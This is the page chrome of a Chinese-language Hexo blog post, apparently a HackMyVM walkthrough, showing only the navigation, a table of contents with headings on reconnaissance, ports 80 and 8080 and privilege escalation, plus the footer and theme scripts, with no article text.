      <div class="post-nav-item">
    <a href="/2025/03/26/Hackmyvm-Newbee/" rel="next" title="Hackmyvm-Newbee">
      Hackmyvm-Newbee <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86"><span class="nav-number">1.</span> <span class="nav-text">信息搜集</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#80%E7%AB%AF%E5%8F%A3"><span class="nav-number">2.</span> <span class="nav-text">80端口</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#8080%E7%AB%AF%E5%8F%A3"><span class="nav-number">3.</span> <span class="nav-text">8080端口</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%8F%90%E6%9D%83"><span class="nav-number">4.</span> <span class="nav-text">提权</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">lvzhouhang</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">63</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">22</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lvzhouhang</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    <span title="站点总字数">340k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">5:09</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/xxx/anime.min.js"></script>
  <script src="/xxx/velocity/velocity.min.js"></script>
  <script src="/xxx/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
